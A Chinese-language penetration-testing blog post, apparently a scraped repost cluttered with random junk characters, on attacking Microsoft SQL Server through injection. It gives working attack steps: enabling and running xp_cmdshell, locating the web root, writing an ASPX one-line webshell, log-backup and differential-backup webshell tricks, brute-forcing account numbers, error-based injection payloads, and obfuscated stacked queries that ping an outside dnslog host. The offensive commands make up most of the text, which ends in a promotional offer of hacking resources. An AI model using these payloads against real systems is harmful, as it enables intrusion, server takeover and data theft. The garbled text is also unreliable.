|
* J9 W8 R) r: y: f
上次写了一篇文关于SQL注入的文章,居然有人说SQL注入过时了!!!  % R" f/ u# O1 s: a0 |. A
前言:本次用4个有趣的实战案例来分别讲:狠–常见getshell快–快速报错注入准–字符长度100限制下注入绕–绕福某大学安全狗虽然只有4个实战案例,但真的挺实用、通用哦,当然此次都是站在前辈肩膀上实践总结的可能还不够全,如有分析不足的地方望各位大佬指正! 4 P( m+ {1 ]# a1 h* N
狠–常见getshell:实战一:这是一次挖到一个小OA系统的通用管理员弱口令,后台可以执行sql语句并且是sa权限,这运气没谁了哈哈但可以去edu刷分的大部分目标xp_cmdshell却废了.只能恰个弱口令…
& \4 u4 c2 a% r# `) R' [ 先说可以xp_cmdshell部分:xp_cmdshell写shell技巧:条件:sa权限,常见问题:xp_cmdshell存储过程在 SQL Server 2005以后默认关闭,需要手动开启 
8 S9 s; G. M+ A3 q6 x$ p' F 开启方法#开启方法% }; J4 k6 z, \1 Q9 c
execute(sp_configure "show advanced options",1) #将该选项的值设置为1
6 k& Y" @% i0 O' B execute(reconfigure)
' [3 R! e# B8 c #保存设置
# G z6 B+ r# W) j execute(sp_configure "xp_cmdshell", 1) #将xp_cmdshell的值设置为1
8 X+ w4 |) }- } execute(reconfigure)
% _$ @& c( l1 j9 i #保存设置- b; G* b3 T- \; W( Y/ d5 b6 | J
execute(sp_configure) #查看配置
; V) T8 ?" X6 j: @ M execute(xp_cmdshell "whoami")
/ M+ f* q$ l% N1 v2 v# v #执行系统命令
3 x9 {; d9 [' s2 ` 或者3 m1 n3 U9 s: x0 @+ n% m
exec sp_configure show advanced options,1;
1 O9 k% q# y: ^9 D) v reconfigure;+ v$ K; G* m) n5 f, `4 @/ R
exec sp_configure xp_cmdshell,1;9 [! L/ {6 R# A( ^& a
reconfigure;
5 Z0 |& `) k9 p X. f4 | 1 I& }) R2 G9 t4 d; X
exec sp_configure;+ j. ~) s/ Z3 G, q
exec xp_cmdshell whoami;& v/ a8 B" S9 _
exec master ..xp_cmdshell "ping dnslog"上面执行开启命令后,执行一下 whoami ,system 权限,直接起飞!  & @2 M. j$ w/ _
写shell技巧:先找网站根路径:exec xp_cmdshell where /r d:\ *.aspx;' T6 K5 O# @( k
直接写入aspx文件同目录却访问不了,麻了!问了一下同事,他说:估计做了和springboot类似的路由映射,但静态文的目录可能不会走路由. 访问路径如下 
# g7 A+ r- _' _, y( R' a1 j) M( e8 T 故再找根路径下绝对静态可解析路径:exec xp_cmdshell where /r D:\OA *.jpg;$ K% w3 j; [/ [* N+ j4 j
 " X! t8 M, W6 z! Q
写shell,这里也需要注意一点,dos对尖括号<>会报错,所以需要用^转义一下,或者echo"一句话" > hack.aspx 用双引号echo ^<^%@ Page Language="Jscript" 3 P; d0 b6 u( q/ l
%^>^^ >d:\xx\xx.aspx. x) @/ y( z4 _* y9 d5 \
然后倚天大剑(蚁剑)连接http://x.x.x.x/login/login/xx.aspx 4 Q; A$ }0 ?& [6 Y) w O
即可.其它gethell大全:剩下不可以xp_cmdshell的,但其它大多getshell方法,都没法用这些方法前提条件都是:SQL Server 2008不可用,SQL Server 2000可用因为我这版本是SQL Server 2008不可用,吐了!!于是只好备份getshell + L x2 ]) C8 H( U+ ?2 g. h* {
备份getshell 至少DBO权限)log备份(推荐):优势:1、重复性好,多次备份的成功率高2、相对于差异备份而言,shell的体积较小利用条件:1、前提得知绝对路径,并且可写2、站库不分离3、数据库必须被备份过一次
1 H" B& N6 u+ T/ v& G ;alterdatabase 库名 setRECOVERYFULL--
+ d B( m& @5 g# Q% x1 P" q& g ;createtable 数据库名..表名(a image)-- //建表( j; q" Z6 u1 `. y7 B5 Z
;insertinto 数据库名..表名(a) 5 D& \. t6 P+ n- L
values (0x一句话木马)-- //插入一句话木马到表中,注意16进制
; ]. V0 \6 b3 }6 e6 u! T) O6 K$ f2 ]: C* U, b
;backupdatabase 数据库名 to disk = c:\www\panda.bak-- //先手动给数据库备份一遍 2 c/ j: A# S( e, a& A/ n& r
: h$ F# W' k0 i) h j# h/ W
! Z3 j* N9 @ c) y% U) j$ s
;backuplog 数据库名 to disk = c:\www\panda.aspwith init-- //利用log备份到web路径getshell差异备份的条件:1、前提知道绝对路径,路径可写。
+ W7 T" l' v( L% ~; @# R 2、HTTP 500错误不是自定义3、WEB和数据在一块还有的就是数据库中不能存在%号之类的,不然也是不成功的4、数据量不能太大;backupdatabase 库名 to disk = c:\bak.bak。
. H# Y$ I7 U! n ;-- //先手动备份一次
# R8 p1 ~$ V) Y! T ;createtable 数据库名..表名(a image)-- //建立表,加字段
4 |6 [# o- ^6 v% n ;insertinto 数据库名..表名(a) values (0x一句话木马)
; r$ `: D- ^) h5 ~ -- //插入一句话木马到表中,注意16进制
0 o9 C: h+ n, B) w* V ;backupdatabase 库名 to disk = c:\shell.aspwith differential , format ;-- //进行差异备份 3 ^0 ?. A. W9 ]/ Q. R
小结:备份getshell这一般对php和asp有用,注意asp备份生成的文件经常有没有闭合的问题,但aspx我暂时没找到成功例子我这是aspx的2种备份都试了,但因为备份后会插入多个shell如下  4 ~0 E. e8 ]1 l, y3 L; |# ~
导致:出现多次,报错:只能有一个page指令 试了闭合和其它方法不行 
' ^6 @8 l6 C7 T% {- d: o 快–快速报错注入:实战二:mssql报错注入很方便,但柯大佬也没完善总结,我试了几种方法,这里快速报错最快,且在之后的手工注入很实用: 
2 Y& W6 v/ I7 o8 U 注册一个账号但要审核,如上图消息里得到账号规律,对后4位数爆破,成功 00xxxxx 123456然后登录后台,在某处发现sql注入:Users/xx.ashx?ID=00) and 1=1 --+ //闭合成功 0 O' q. X2 `/ i3 f+ G
/ Y; |( P# K1 I3 V5 y L ) and 1=convert(int,user_name()) --+ #查当前数据库用户,结果不是sa
2 f+ G; H# |. } 1)/**/;/**/exec/**/master ..xp_cmdshell /**/"ping xx.dnslog.cn" 4 B: G$ G% s F# a
--#不死心,执行一下cmdshell   # V+ ^& e; ^5 c' j8 f0 E
我是一名安全渗透测试工程师,热爱安全行业,用心做安全,在工作的同时学习知识,另外,我积攒了一些网络安全的学习视频和资料,需要的可以下载学习关注我,私信回复“资料”免费获取网络安全视频、渗透测试、工具包、应急响应、web安全等架构资料。 + q6 f( Y8 \) Z6 ~% X
3 q, X& ]. h1 n
6 ~' s: ]/ `! m3 r% c" R
3 q X% P% v( p. q
8 b3 f( `, O! r6 C | 
